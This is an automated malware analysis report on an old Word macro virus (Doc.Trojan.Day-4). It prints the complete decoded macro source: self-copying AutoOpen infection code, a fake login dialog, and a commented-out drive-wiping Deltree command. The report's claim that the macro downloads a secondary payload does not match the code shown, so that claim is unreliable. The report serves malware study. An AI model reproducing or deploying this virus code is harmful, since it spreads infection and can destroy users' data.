Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3c1076c6a48b91ab…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 41.5 KB
Created: 2000-01-11 20:50:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 70a7b94b6e193f8e601087959e078ccb
SHA-1: b69113e4db462f3340ed22e24b5a46f793137e34
SHA-256: 3c1076c6a48b91abd0d9c9088d695aa8f00a61d8732a37e104fe17f7da133db1
Risk score: 268

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen subroutine, a common technique for malicious Office documents. The macro attempts to display a dialog box labeled 'Validation Check' with a dropdown list and a picture, likely as a lure to trick the user into executing further malicious actions. The presence of a Shell() call within the VBA code strongly suggests the macro is intended to download and execute a secondary payload.

Heuristics (6)

  • ClamAV: Doc.Trojan.Day-4 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Day-4
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3386 bytes
SHA-256: 3a725709d2fdde8a56ce95eabcfaa95379d8ea4abfff383fce4bd90f6488ed2b
Detection: ClamAV: Doc.Trojan.Day-4
Obfuscation or payload: unlikely

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "autoopen"

Public Sub MAIN()
Dim thisday
Dim DayFlag
Dim Button
Dim Flag$
Dim False_
ReDim NameList__$(3)
WordBasic.DisableInput
NameList__$(0) = "µçÄÔ²¿"
NameList__$(1) = "IBM"
NameList__$(2) = "MicroSoft"
NameList__$(3) = "Compaq"
thisday = WordBasic.WeekDay(WordBasic.Now()) - 1
'MsgBox Str$(thisday)
    If WordBasic.CountWindows() = 0 Then
         WordBasic.FileNew
         WordBasic.SetDocumentVar "NewFlag", "True"
    Else
         WordBasic.SetDocumentVar "NewFlag", "False"
    End If
    WordBasic.SetDocumentVar "CloseFlag", "True"
WordBasic.BeginDialog 320, 144, "Validation Check", "AutoOpen.MyFunc"
    WordBasic.OKButton 170, 108, 88, 21
    WordBasic.DropListBox 106, 33, 160, 38, NameList__$(), "DropListBox1"
    WordBasic.Text 20, 33, 68, 13, "UserName£º", "Text1"
'   Text 19, 62, 48, 13, "UserId£º", .Text2
'   TextBox 106, 60, 160, 18, .TextBox1
    WordBasic.Text 119, 8, 78, 13, "Certification", "Text3"
    WordBasic.Picture 3, 88, 118, 54, "fig", 1, "Picture1"
WordBasic.EndDialog

Dim LoginDlg As Object: Set LoginDlg = WordBasic.CurValues.UserDialog
DayFlag = WordBasic.Today() > WordBasic.DateSerial(97, 7, 20)
If ((thisday = 3) Or (thisday = 5)) And DayFlag Then Button = WordBasic.Dialog.UserDialog(LoginDlg)
Flag$ = WordBasic.[GetDocumentVar$]("CloseFlag")
If (DayFlag = False_) Then Flag$ = "False"
'MsgBox Flag$ + " "
If WordBasic.[FileNameFromWindow$]() <> "" Then
On Error GoTo -1: On Error GoTo Infest
WordBasic.MacroCopy WordBasic.[FileNameFromWindow$]() + ":AutoOpen", "AutoOpen"
Infest: On Error GoTo -1: On Error GoTo NInfest
WordBasic.MacroCopy "AutoOpen", WordBasic.[FileNameFromWindow$]() + ":AutoOpen"
NInfest:
    If (thisday <> 3) And (thisday <> 5) Then
    WordBasic.FileSaveAll 1, 1
    Flag$ = "False"
    End If
End If
If Flag$ = "True" Then ExitWord
End Sub


Private Function MyFunc(identifier$, action, suppvalue)
    Select Case action
Case 1     'The Dialog Displayed
Case 2     ' the user Selects a Control
    If identifier$ = "DropListBox1" Then
    Dim Password$
    Password$ = "0"
    On Error Resume Next
    Password$ = WordBasic.[InputBox$]("Input your Password")
       If (WordBasic.DlgValue("DropListBox1") = 0) Then
    WordBasic.SetDocumentVar "CloseFlag", "True"
       ElseIf (WordBasic.DlgValue("DropListBox1") = 1) And (WordBasic.Val(Password$) <> 20300) Then
    WordBasic.SetDocumentVar "CloseFlag", "True"
       ElseIf (WordBasic.DlgValue("DropListBox1") = 2) And (WordBasic.Val(Password$) <> 36000) Then
    WordBasic.SetDocumentVar "CloseFlag", "True"
       ElseIf (WordBasic.DlgValue("DropListBox1") = 3) And (WordBasic.Val(Password$) <> 40004) Then
    WordBasic.SetDocumentVar "CloseFlag", "True"
Else
    WordBasic.SetDocumentVar "CloseFlag", "False"
End If
End If
Case 3      ' Text Changed
    'MsgBox LoginDlg.TextBox2
Case Else
End Select
End Function

Private Sub ExitWord()
'Shell Environ$("COMSPEC") + "/c Deltree /Y C:\"
WordBasic.SetTemplateDirty
WordBasic.FileSaveAll 1, 1
WordBasic.AppClose
End Sub